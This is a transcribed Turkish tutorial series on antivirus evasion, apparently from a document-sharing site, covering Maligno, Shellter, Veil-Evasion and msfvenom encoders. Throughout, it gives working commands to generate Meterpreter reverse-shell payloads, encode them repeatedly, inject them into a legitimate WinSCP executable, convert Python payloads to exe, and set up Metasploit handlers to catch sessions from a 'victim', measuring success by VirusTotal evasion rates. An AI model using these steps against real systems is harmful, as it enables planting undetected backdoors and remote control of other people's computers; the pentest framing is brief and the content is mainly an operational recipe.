Anti-Virus Atlatma Maligno Kullanımı

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "Anti-Virus Atlatma Maligno Kullanımı"

Transkript

1 Anti-Virus Atlatma Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource olarak geliştirilen, Metasploit framework ün payload/shellcode üretme aracı olan msfvenom u kullanarak, meterpreter reverse http, https ve https proxy ile beraber pyton meterpreter reverse tcp bağlantılarını sağlayacak olan shellcode ları üreterek AES ile şifreleyip ayrıca ürettiği python çıktısını obfuscate edip kullanıma hazır hale getirmektedir. Kurulum Yazı süresince yapılan işlemlerde Kali linux işletim sistemi kullanılmıştır. Maligno nun son sürümü dowload sayfasından indirilebilir. wget tar zxvf maligno-2.4.tar.gz # sıkıştırılmış dosya açılıyor cd maligno-2.4/ && bash install.sh Çalıştırılan bash script sistem güncellemesini yaptıktan sonra, gerekli paketleri yükleyecektir. Bundan sonra şifreleme için kullanılacak olan anahtar üretilmeye başlanacaktır. İlk olarak özel anahtarımız 2048 bitlik RSA ile üretilecek, ardından server için üretilecek olan ssl sertifikası için gerekli kısa bir kaç soruya yanıt vermemiz beklenmektedir. Bunların sonunda işlemler bitmiş olacak ve konfigürasyon dosyasını güncellememiz gerekecektir.

2 Konfigürasyon Üretilecek olan zararlı yazılımlara ait bilgileri içeren server_config.xml dosyasını reverse bağlantı için kullanılacak olan sunucuya göre ayarlamamız gerekmektedir. Burada düzenlenmesi gereken bilgilerden bazıları; Metasploit payload ismi Payloadlar için gerekli host adresi ve port numarası Hangi encode işleminden geçirileceği Encode işleminin kaç iterasyon işleminden geçeçeği Kullanılmasının istenmediği karakterler (badchars) Network scope alanı Bu alanlardan düzenlenmesi zaruri olan kısımlar, bilgisayarda kurulu olan Metasploit framework yolu ve LHOST alanlarıdır. İstenildiği takdirde, üretilen shellcode un geçirileceği encode tipi ve iterasyon sayısı veya reverse bağlantıda kurbanın bize geleceği port adresi gibi alanlar da değiştirilebilir.

3 Maligno Server Maligno klasörü içerisinde bulunan ve kullanılabilecek dosyalardan biri olan maligno_srv.py, oluşturulacak olan zararlıların bulaştığı kurbanlar hakkında bilgilendirme sunan ve bu payloadlar için Metasploit tarafında kullanılabilecek Resource dosyalarını oluşturmaktadır. Aynı zamanda uygulamanın güncellemelerini de kontrol etmektedir. Maligno Client Generator Maligno klasörü içerisinde bulunan ve kullanılabilecek dosyalardan bir diğeri olan clientgen.py scripti, Metasploit in meterpreter reverse http, https, https_proxy ve python meterpreter reverse tcp bağlantılarını elde edebilecek payloadları oluşturur. Çıktılar (clients klasöründe) python dosya formatındadır. Bunların yanında oluşturulan zararlı yazılımlar için Metasploit tarafında kullanılacak handler için payloadların resource dosyaları (msfresource klasöründe). da oluşturulmaktadır Oluşturulan zararlılar python dosya formatında verilmektedir. Enfekte işleminin yapılacağı makinede python interpreter yüklü ise normal bir python dosyasıymış gibi çalıştırabiliriz. Fakat bilgisayarda python yüklü olmayacağı gibi kullanılan python modülleri de yüklü olmayabilir ve bu yüzden dosya çalışma sırasında sıkıntılar yaratabilir. Bu yüzden python dosyamızı bazı yardımcı modüller (PyInstaller, Py2Exe, cx_freeze) ile çalıştırılabilir dosya formatı olan exe ye çevirebiliriz. Yazıda dönüştürme işlemi için PyInstaller kullanılacaktır. Bağlantıyı kurması için kullanılacak olan zararlıları oluşturmak için clientgen.py dosyasını kullanacağız. Bunun için; python clientgen.py -f server_config.xml -s true Burada -f parametresi için kullanılan argüman, içeriğini

4 düzelttiğimiz konfigürasyon dosyası, -s parametresi ise hem resource dosyalarını oluşturur hemde scriptlerin çalıştırılabilmesini sağlar. Sorunsuz bir şekilde python scriptleri ve Metasploit resource dosyaları oluşturulmuştur. Python Dosya ile Reverse Bağlantı Oluşturulan zararlıları kurban bilgisayarda çalıştırmadan evvel gelecek olan bağlantıyı yakalayacak handlerı oluşturmamız gerekmektedir. Yukarıdaki satırlarda belirttiğimiz gibi Maligno, handler için resource dosyalarını da oluşturmaktadır. Oluşturulan zararlılardan meterpreter için reverse HTTPS bağlantı veren dosyayı çalıştıracağımız farz edelim ve buna göre oluşturulan resource dosyasını yükleyelim.

5 Python un ve diğer modüllerinin yüklü olduğunu varsayıp, kurban bilgisayarında oluşturduğumuz scripti çalıştıralım. Dosya çalıştırıldıktan sonra dinlemeye aldığımız Metasploit tarafına bağlantı gelecektir ve session oluşacaktır.

6 EXE ile Reverse Bağlantı Önceden belirttiğimiz gibi her bilgisayarda python olmayabilir. Olsa dahi gerekli modüller yüklü olmayabilir. Bu yüzden python dosyasımız bazı modülleri kullanarak çalıştırılabilir dosyalara dönüştürebileceğimizden bahsetmiştik. PyInstaller ile python dosyamızı exe formatına dönüştürmek için aşağıdaki komut kullanılabilir. pyinstaller.exe onefile windowed standalone_1_standard_windows_reverse_https.py

7 İşlemin sonunda komutu çalıştırdığımız klasörün içerisinde build ve dist klasörleri oluşacaktır. Dist klasörü altında aradığımız exe dosyası bulunmaktadır. Bu dosyaya çift tıkladığımızda veya komut satırından çalıştırdığımızda, herhangi bir exe dosyasıymış gibi, beklemeye aldığımız Metasploit tarafına bağlantı düşecektir. Tarama Sonucu Oluşturduğumuz zararlı yazılımın, online tarama sonucu aşağıda

8 ki resimlerde verilmiştir. İlk olarak python dosyamız için VirusTotal sayfasında yaptığımız taramanın sonucunu görelim. Şimdi ise PyInstaller ile exe ye çevirdiğimiz zararlı dosya için VirusTotal web sitesinde yapılan taramanın sonucunu görelim. Anti-Virus Atlatma 4 Bir önceki yazıda Shellter aracının içerisindeki payloadları kullanarak, çalıştırılabilir dosya formatında ki bir dosyaya arka kapı yerleştirmiştik. Oluşturulan bu zararlı yazılımın Virustotal sitesindeki taramasından elde edilen sonuç 1/56 idi. Bu yazıda yine Shellter aracını kullanacağız fakat bu sefer gömülü gelen payloadlar yerine, Metasploit Framework ün içerisinde bulunan Msfvenom ile üreteceğimiz ve bize meterpreter ile reverse bir TCP bağlantı veren payload kullanacağız.

9 Msfvenom Öncelikle Msfvenom kullanarak bir payload üreteceğiz. Msfvenom, Metasploit Framework ün içerisinde bulunan Msfpayload ve Msfencode araçlarının birleşimidir. Üstünde iyileştirmeler ve optimizasyon yapılmıştır, önceki araçlara göre hızlı bir şekilde payload/shellcode üretmektedir. Artık Metasploit içerisinde msfpayload ve msfencode araçları kullanılmamaktadır. Default olarak Msfvenom gelmektedir. Basit bir şekilde, x86/shikata_ga_nai ile 10 iterasyonla encode edilmiş bir payload kullanacağız. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5656 -a x86 -e x86/shikata_ga_nai -i 10 -f raw -o Backdoor.raw Shellter Daha öncede bahsettiğimiz gibi Auto ve Manual olmak üzere iki mod bulunmaktadır. Manual modda çok fazla interaktif işlem olduğu için, kimi zaman kötü bir çıktı alınabilir. Hız, kolaylık ve bypass kabiliyetinin yüksekliği nedeniyle Auto mod (A) tercih edilir. Mod tercihinden sonra arka kapıyı enjekte edeceğimiz zararlı yazılımın dosya yolunu girmemiz gerekmektedir. Örnek olarak SFTP yazılımı olan portable WinSCP indirilip, kullanılmıştır.

10 Custom Payload Gelen ekranda iki seçenek sunuluyor. İlki, bir önceki yazıda anlattığımız, Shellter içerisinde gömülü olarak gelen payloadlardan birini kullanarak zararlıyı oluşturma. İkincisi, elimizde olan bir payloadı çalıştırılabilir dosyaya enjekte etme seçeneği. Custom manasındaki C yi girdikten sonra, Msfvenom ile ürettiğimiz payloadın yolunu göstererek yola devam ediyoruz. Shellter v4 ile birlikte Reflective DLL destekler şekilde gelişmiştir. Reflective DLL seçeneği ile seçilecek olan bir DLL processin çalışması sırasında kullanılabilir. Kullanılacak DLL disk üzerinde herhangi bir işlem yapmayan, üzerinde çalıştığı processin adres uzayında çalışacaktır. N diyip geçiyoruz. Payload hakkında kısa bir bilgi gösterdikten sonra, vermiş olduğumuz payloadı, çalıştırılabilir dosyaya enjeksiyon işlemi başlamış oluyor.

11 Enjeksiyon işlemi tamamlandı. çalıştırılabilir dosyamıza yerleştirilmiştir. Bu aşamadan oluşturduğumuz arka sonra kapı Tarama Sonucu Oluşturduğumuz zararlı yazılımın, VirusTotal sayfasında yapılan online tarama sonucu aşağıdaki resimde verilmiştir.

12 Görüldüğü üzere kendi oluşturduğumuz payloadı kullanmak, Shellter içerisinde gömülü gelen payloadları kullanmaktan daha iyi sonuç verdi. Şimdi ise oluşturulan zararlıyı, kurban makinesinde çalıştıralım ve Metasploit e gelecek bağlantıyı görelim. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yapmak için multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 5656 set exitonsession false exploit -j -z

13 Oluşturulan zararlı yazılımın kurban bilgisayarında çalıştırılması sonucunda, dinlemeye aldığımız handler a session düşecektir. Var olan sessiona geçiş yapıp, meterpreter shell imizi kullanabiliriz. Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass

14 aracıdır. Genel olarak var olan bir çalıştırılabilir dosyaya zararlı yazılımımızı entegre etmeye yarar. Bu şekilde ürettiğimiz (Metasploit in msfvenom aracını kullanarak) arka kapıyı, çalıştırılabilir dosya formatı olan exe formatındaki dosyalara Shellter ile enjekte edip kurban makinesinde çalıştırabiliriz. Kurulum Anlatılacak olan işlemlerde Kali linux işletim sistemi kullanıldığı için, işlemler linux sistemlere göre anlatılacaktır. Shellter in download sayfasını incelediğimiz vakit bir kaç alternatif olduğunu görüyoruz. Zip dosyasını indirmek (Yazım sırasındaki son versiyon v5.1) Linux dağıtımlarının depolarından kurmak (Kali için v3.1) Debian/Arch dağıtımları için hazır paket ile kurmak (Debian için v2.0) Alternatifler böyle iken zip dosyasını indirip, son versiyon ile çalışmak daha mantıklı olacaktır. Bu arada v4.0 dan sonra Shellter içerisinde bulunan hazır payloadları enjekte etme seçeneği eklenmiştir. Versiyon 4 ten önce, kendi hazırladığımız payload ile çalıştırılabilir dosyayı birleştirip anti-virüs bypass işlemini gerçekleştiriyorduk. Uygulama linux ortamlarda Wine ile çalışmaktadır. Download sayfasından indirdiğimiz zip dosyasını, açtıktan sonra klasör içerisinde yer alan shellter.exe yi wine ile çalıştırmak yeterlidir. Kısa bir süre gerekli konfigürasyonlar yapılacak ve Shellter başlayacaktır. Kurban bilgisayar kullanmaktadır. Windows 7, saldırgan ise Kali Linux

15 Auto-Manual Mod Shellter içinde iki mod vardır. Bunlardan biri Manual, daha esnek bir şekilde işlemler gerçekleştirilir, kullanıcıyla fazla iletişim kurarak zararlıyı çalıştırılabilir dosyaya enjekte eder. Diğeri Auto, bu modda iken daha seri bir şekilde, çok fazla uygulamaya müdahale etmeden, kısa bir kaç işlem sonunda zararlıyı çalıştırılabilir dosyaya enjekte edebilirsiniz. Shellter in giriş ekranından bir kare; Auto Mode İlk olarak auto mod ile bir zararlı yazılım oluşturalım ve bunun online tarama sayfalarındaki sonuçlarını görelim.

16 Seçilecek olan mod Auto, uygulamaya girilecek opsiyon ise A dır. Yapılacak işlemin modunu seçtikten sonra arka kapıyı enjekte edeceğimiz çalıştırılabilir dosya formatındaki dosyanın yolunu vermemiz gerekmektedir. Örnek olarak SFTP yazılımı olan WinSCP yi kullanıyoruz. Stealth Mode Bahsi geçen Stealth modu, Shellter in 5.0 versiyonuyla beraber gelmiştir. Bu modun aktif edilmesi ile bir dosyaya birden çok sayıda payload enjekte edilebilmektedir. Enjekte edilen payloadlar birbirinden bağımsız şekilde çalışabilirler. Payloads Versiyon 4 ile birlikte Shellter kendi içerisinde gömülü olarak payload seçme seçenekleri sunuyor demiştik. Sunulan seçenekler arasında meterpreter için bind ve reverse TCP, reverse HTTP ve HTTPS gibi Metasploit payloadları mevcuttur. Bu yazıda Shellter içerisinde gömülü olarak gelen payloadlardan olan Meterpreter_Reverse_TCP kullanılacaktır. Bir sonraki yazıda ise özel olarak kendi ürettiğimiz payload ı Shellter aracılığıyla çalıştırılabilir dosyaya enjekte edip sonuçları göreceğiz. Listelenmiş payloadlardan birini

17 kullanmak için interaktif ekrana L girmemiz gerekiyor. Daha sonra kullanacağımız payloadın, verilenler arasından, index numarasının girilmesi gerekmektedir. Payloadın index numarasını girdikten sonra, payloadın tipine bağlı olarak girilmesi gereken parametrelerin değerleri olacaktır. Bizim seçtiğimiz payload için girilmesi gerken iki parametre vardır. LHOST ve LPORT değerleri. Bunlar Metasploit tarafında başlatacağımız handler için dinlemede bulunacak IP ve port değerleridir. Gerekli değerler girildikten sonra Shellter, payload ile ilgili kısa bir özet geçerek zararlı enjekte işlemine başlayacaktır.

18 Kısa bir sürenin ardından, çalıştırılabilir dosyanın boyutuna bağlı olarak, seçtiğimiz payload çalıştırılabilir dosyaya enjekte edilecektir. Tarama Sonucu Oluşturduğumuz zararlı yazılımın, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak VirusTotal sayfasında yaptığımız taramanın sonucunu görelim.

19 Bir diğer online malware tarama sayfası olan Jotti den gelen sonucunu görelim. Resimlerden anlaşılacağı üzere Shellter anti-virus bypass yazılımı, bir önceki yazıda anlattığımız Veil-evasion dan daha iyi sonuçlar vermektedir. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yapmak için multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 5656 set exitonsession false exploit -j -z

20 Oluşturulan zararlı yazılımın kurban bilgisayarında çalıştırılması sonucunda, dinlemeye aldığımız handler a session düşecektir. Bir sonraki yazıda Shellter ı kullanarak, kendi oluşturduğumuz payloadı çalıştırılabilir bir dosyaya enjekte edeceğiz ve tarama sonuçlarını karşılaştıracağız.

21 Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan Veil-evasion u kullanacağız. Kurulum Linux üstüne kurulumu için mevcut kodlarının olduğu Github sayfasından ( indirip setup klasörünün altında bulunan setup.sh scripti ile kurulumu yapabilirsiniz. git clone cd Veil-Evasion/setup bash setup.sh -s

22 Veya depo dan direkt olarak kurulumunu yapabilirsiniz. bağımlılıklarıyla beraber Bunun için; apt-get install veil-evasion Çok sayıda paketi de kendisiyle beraber kuracaktır. İndirme ve kurulum işlemleri bittikten sonra terminal ekranında yapılandırılan konfigürasyonlar ve dosya yolları görünecektir. 32 bit bir işletim sisteminde daha rahat olacaktır kurulum işlemi. 64 bit sistemlerde kurulum yapıldığı zaman, gerekli yan uygulamalar ve wine 32bitlik sistemlere göre kurulacak ve yapılandırılacaktır, çoğu zaman da hata ile

23 karşılaşılabilmektedir. Konfigürasyon dosyası olan /etc/veil/settings.py içerisinde sisteminize uygun değişiklikleri yapabilirsiniz. Konfigürasyon dosyasında boş olarak görünen alan olan MSFVENOM_OPTIONS kısmı payload oluşturma sırasında ham bir payload yerine ek parametrelerle bir payload oluşturma imkanı sağlar. Örnek olarak oluşturma sırasında seçilecek bir encode tekniği kullanılarak birkaç iterasyondan geçirmesi sağlanabilir. Veil-evasion Kaynak koddan kurduysanız Veil-Evasion klasöründeki VeilEvasion.py dosyasını çalıştırarak, depodan kurduysanız, komut satırından veil-evasion komutunu girerek başlatabilirsiniz. Başlangıç ekranından görüldüğü üzere şu an için kullandığımız versiyon olan için kullanılabilecek 47 payload vardır.

24 Kullanım Kullanımı Metasploit ile benzerdir ve TAB ile tamamlama desteği vardır. Öncelikle list diyerek kullanılabilecek payloadları görelim. Aşağıda verilmiş olan resimden de anlaşılacağı üzere C, C#, GO, Python, Ruby, Powershell gibi dilleri kullanarak oluşturulabilen payloadları vardır. Bir payloadı seçmek için use komutunu kullanmanız gerekmektedir. use [Payload index numarası] veya use [Payload ismi] kullanım şekilleri ile kullanılabilir.

25 Örnek Örnek olarak Python ile yazılmış, meterpreter ile bize reverse_tcp bağlantı verecek olan payloadı kullanalım. Seçtiğimiz payload: python/meterpreter/rev_tcp, index numarası 31.Bu payloadı kullanmak için use 31 veya use python/meterpreter/rev_tcp diyoruz.

26 Gelen ekranda görüldüğü üzere birçok parametre vardır > Bunları teker teker açıklamak gerekise; ARCHITECTURE: Varsayılan olarak 32 bittir. Üretilecek olan zararlı yazılımın işlemci mimarisini belirtir. COMPILE_TO_EXE: Varsayılan olarak Y dir. Üretilecek olan zararlı yazılımın çalıştırılabilir bir dosya tipi olarak EXE ye dönüştürülmesini belirtir. EXPIRE_PAYLOAD: Opsiyonel olarak kullanılabilir bir alandır. Devre dışı bırakılacak özelliği tanımlamamızı sağlar. LHOST: Metasploit te dinlemeyi yapacağımız handler in IP adresi. LPORT: Metasploit te dinlemeyi yapacağımız handler in port adresi. USE_PYHERION: Varsayılan olarak N dir. Üretilecek zararlı yazılımın ek olarak Python un pyherion şifrelemesinden geçirileceğini belirtir. Msfvenom ile Backdoor Veil ile oluşturacağımız zararlı yazılım ile karşılaştırıp farkı görmek açısından önce Metasploit araçlarından olan msfvenom ile basit bir arka kapı oluşturalım. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=7788 -f exe -o rawbackdoor.exe Oluşturduğumuz zararlı yazılımı online bir anti-virüs tarama sitesi olan üstünde tarayalım ve

27 sonuçları görelim. Not: Bu tarz sistemler çıktılardan gelen sonuçları anti-virüs firmalarıyla paylaştığı ve imza tabanlı çalıştığı için, önceden yapılan taramalardan dolayı oluşturulan payloadları çok sayıda anti-virus yazılımı keşfedebilir düzeye gelmiştir. Bu yüzden anti-virus bypass uygulamalarında bir not olarak, online sistemlerde taratmayın diye not düşebilirler. Veil ile Backdoor Veil üstünde oluşturacağımız zararlı yazılımın, seçtiğimiz modüle göre, gerekli parametrelerini girdikten sonra generate komutu ile oluşturma işlemini başlatabiliriz. Generate dedikten sonra oluşturma işlemine başlamadan önce bize çıktı olarak vereceği dosyanın adını ne koyacağımızı soruyor. Bu değer default olarak payload olarak belirlenmiştir. Seçtiğimiz modülün parametrelerinden olan COMPILE_TO_EXE ye argüman olarak Y değerini verdiğimiz için oluşturalacak olan Python dosyasını exe olarak çalıştırılabilir dosya formatına dönüştürecektir. Burada oluşturulan çıktı dosyasının, çalıştırılabilir dosya formatına

28 dönüştürülmesi işlemi farklı python modülleri gerçekleşebilmektedir. Veil içinde default olarak Pyinstaller kullanılmaktadır. Bizde bu yazı sırasında 1 seçeneğinde bulunan Pyinstaller ı kullanacağız. 1 değerini girdikten sonra arka kapı oluşturma işlemi başlıyor. Zararlı yazılımın oluşturma işlemi tamamlandı. Verilen çıktıda, oluşturulan zararlı yazılım ile ilgili birkaç özellik bulunmaktadır. Bunlar, hangi dilde oluşturulduğu, payload olarak hangi metasploit payload ı kullanıldığı, kullanılan parametreler ve bunlara verilen değerler, payload dosyasının (zararlı yazılımımızın) bulunduğu konum ve handler dosyasının bulunduğu konum.

29 Metasploit Handler Resource Burada oluşturulan handler dosyası (resource), Metasploit tarafında gelen bağlantıları bekleme sırasında oluşturacağımız handler in script versiyonudur. Handler dosyası ile Metasploit tarafında, otomatik olarak komutları oluşturulan, oluşturduğumuz zararlı yazılıma göre parametreleri girip beklemeyi başlatabiliriz. Scripti Metasploit üstünde çalıştırmak için komut satırından msfconsole -r [Resource dosya konumu] veya açık olan Metasploit komut ekranında resource komutuyla şu şekilde yapılabilir resource [Resource dosya konumu]. Örnek bir kullanım aşağıda verilmiştir. Tarama sonucu Oluşturulan zararlı yazılımın, yapmamamız gereken, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak popüler olan VirusTotal sonucunu paylaşalım. sayfasında yaptığımız taramanın Bir başka online tarama sayfası olan üstündeki taramanın sonucu ise aşağıdaki gibidir.

30 Jotti üzerinde ilk oluşturduğumuz msfvenom ile ham backdoorzararlı yazılımın tarama sonucunu da paylaşırsak aradaki farkı daha net görebilirsiniz. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yukarıda belirttiğimiz resource dosyası ile veya kendimiz multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 7788 set exitonsession false exploit -j -z

31 Dinlemeyi başlattığımıza göre şimdi bekleme sırasında, kurbanın bir şekilde bunu açtığını varsayarsak, meterpreter shell için session ımız oluşuyor. Aktif sessionları listeleyip, bir tanesine geçiş yaptıktan sonra sistem hakkında kısa bir bilgi alma komutu çalıştıralım. Başka Bir Örnek Veil-evasion üstünde kullandığımız python/meterpreter/rev_tcp modülünden sonra kısaca başka bir modül için alınan sonuçları görelim. Kullanılan modül yine aynı aileden fakat farklı bir protokol ile çalışan python/meterpreter/rev_https modülü. Gerekli parametreleri düzenledikten sonra generate diyerek oluşturma işlemini başlatıyoruz.

32 Oluşturulan zararlı yazılımın, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak popüler olan VirusTotal sayfasında yaptığımız taramanın sonucunu görelim. Bir diğer tarama sayfası olan Jotti den gelen sonucunu görelim.

33 Anti-Virüs Atlatma 1 Merhaba, Anti-virüs bypass işlemleri sırasında kullanılan araçların anlatılmasını içerecek olan bu makale, yazı dizisi şeklinde olacaktır. Her yazıda farklı bir anti-virüs bypass aracı anlatılacaktır. İlk olarak, bu makalede, Metasploit Framework ün kendi içerisinde bulunan Encode Modülleri kullanılacaktır. Sızma testleri sırasında veya sosyal mühendislik saldırılarında, kurban kişisinin bilgisayarında Metasploit in ajanı olan meterpreter ile shell alınmak istenebilir. Meterpreter, üstünde çok sayıda post-exploit modülü bulunduran, sızma testleri sırasında işleri oldukça kolaylaştıran bir Metasploit ajanıdır. Başlangıç olarak Metasploit Framework yardımıyla bir arka kapı oluşturacağız. Oluşturulan arka kapı Windows makineler için üretilmiştir ve reverse bağlantı ile 5566 portu üzerinden bizimle bağlantı kuracaktır. Saf bir şekilde üretilen (herhangi bir encode işlemine tabi tutulmamış) zararlı yazılımın online olarak virüs taramasından geçirilmiş sonucu aşağıdadır.

34 Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır. Msfvenom Msfvenom, Metasploit Framework ün arka kapı, shellcode üretmek, encode işlemleri için kullanılan aracıdır. Öncesinde msfpayload ve msfencode ile ayrı ayrı yapılan bu işlemler artık msfvenom ile tek bir seferde gerçekleştirilebilir. Msfvenom içerisinde bulunan encoder lar msfvenom list encoders komutuyla listelenebilir. Görüntülenen encoder ların güç dereceleri rank alanının altında bulunan bölümde belirtilmiştir. Resimden anlaşılacağı üzere excellent derecesinde iki tane encoder bulunmaktadır. Bunlar ; cmd/powershell_base64 x86/shikata_ga_nai Bunları teker teker deneyip sonuçları test edeceğiz.

35 Encoder : cmd/powershell_base64 Msfvenom ile üretilen arka kapıyı oluşturma sırasında encode işlemi uygulamak için -e veya encode parametresi kullanılabilir. Encode işlemini birden çok defa uygulamak için -i veya iterations parametresi kullanılabilir. Biz ilk olarak oluşturacağımız arka kapıyı cmd/powershell_base64 encoder i ile 5 defa encode edecek şekilde oluşturalım. Bu tarz işlemler çokça yapıldığı ve aynı formatta olduğu için

36 anti-virüs yazılımları imza veritabanlarına bunları eklemişlerdir. Bundan kaçınmak için aynı zararlıyı birden çok defa farklı encoder lar ile encode etmek gerekebilir. Bunu yapabilmek için Msfvenom dan elde edeceğimiz çıktıyı bir sonraki msfvenom komutuna pipe etmek gerekiyor. Bu şekilde birden çok encode tekniği ve iterasyonu ile anti-virüslere yakalanma ihtimali düşebilir. Aşağıdaki resimde oluşturulan zararlı yazılım 3 farklı encode tekniği ile encode edilmiştir. İlk durumda cmd/powershell_base64, ikinci durumda cmd/echo ve üçüncü durumda x86/shikata_ga_nai ile encode edilmiştir. Encode işlemi sırasında 5 ve 10 ar defalık iterasyonlarla encode işlemi gerçekleştirilmiştir. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5566 -f raw -e cmd/powershell_base64 -i 5 msfvenom platform windows -a x86 -e cmd/echo -i 10 -f raw msfvenom -e x86/shikata_ga_nai -i 10 platform windows -a x86 -f exe -o backdoor_encode_multi_shikata.exe Reverse Meterpreter Shell Yapılan işlemlerden sonra arka kapıyı kullanıcıya bir şekilde açtırdığımızı varsayarak aşağıdaki işlemleri yapıp, açılacak olan Meterpreter shellini beklemeye koyulabiliriz. Bunun için Metasploit in içerisinde yer alan ve gelecek bağlantıları

37 yakalamaya yarayan handler i kullanmamız gerekmektedir. Sırasıyla aşağıdaki komutlar girilmiştir ve gelecek bağlantılar beklenmektedir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 5566 set exitonsession false exploit -j -z Yukarıdaki işlemler sırasında yapılanların açıklamalarına gelecek olursak, klasik olan multi/handler i kullanıp, payload olarak arka kapıyı oluşturma sırasında kullandığımız payload ı atayıp, bu payload a ait parametreleri(lhost, LPORT) girmek, exitonsession parametresi ile ilk bağlantıdan sonra gelecek olan bağlantıları da beklemesini sağlamak ve bunları bir job haline getirip dinlemeyi başlatmak. İşlemlerin gerçekleştirilmesi sonrasında alınmış bir ekran görüntüsü aşağıdadır. Kurban, oluşturulan zararlı yazılımı açtıktan sonra Meterpreter Shell imiz geliyor, fakat buna otomatik bir geçiş yapmıyor. Bunun nedeni dinlemeyi yaptığımız sırada exploit komutuna verdiğimiz -z parametresidir. Bu parametre gelecek bağlantı ile direk bağlantı kurmaz, oluşturulan session lar içerisine ekler. Sessions komutu ile hali hazırda bağlantıları

38 kurulmuş olan session ları görebiliriz. Gelen bağlatıların görüntülenmesi ve o session a geçiş yapılması sonrasında bağlantının kurulduğu bilgisayar hakkındaki bilgilerin listelenmesi işlemleri aşağıdaki resimde gösterilmiştir.

Anti-Virüs Atlatma 2. Kurulum

Anti-Virüs Atlatma 2. Kurulum Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan

Detaylı

Anti-Virüs Atlatma 3. Kurulum

Anti-Virüs Atlatma 3. Kurulum Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.

Detaylı

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır. Anti-Virüs Atlatma 1 Merhaba, Anti-virüs bypass işlemleri sırasında kullanılan araçların anlatılmasını içerecek olan bu makale, yazı dizisi şeklinde olacaktır. Her yazıda farklı bir anti-virüs bypass aracı

Detaylı

Anti-Virus Atlatma - Maligno Kullanımı

Anti-Virus Atlatma - Maligno Kullanımı Anti-Virus Atlatma - Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource

Detaylı

Anti-Virus Atlatma - Maligno Kullanımı

Anti-Virus Atlatma - Maligno Kullanımı Anti-Virus Atlatma - Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource

Detaylı

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların

Detaylı

Düşünüyorum! Biraz tarihçe.. Maalesef yanılıyorsunuz.

Düşünüyorum! Biraz tarihçe.. Maalesef yanılıyorsunuz. Parolamın Güvenli Düşünüyorum! Olduğunu Maalesef yanılıyorsunuz. 1990 2010 yılları arasında edindiğiniz bilgiler, 8 karakter uzunluğunda ve rastgele büyük harf, küçük harf, rakam ve sembol içeren bir parolanın

Detaylı

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların

Detaylı

Armitage Nedir? Kullanım Öncesi

Armitage Nedir? Kullanım Öncesi Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre

Detaylı
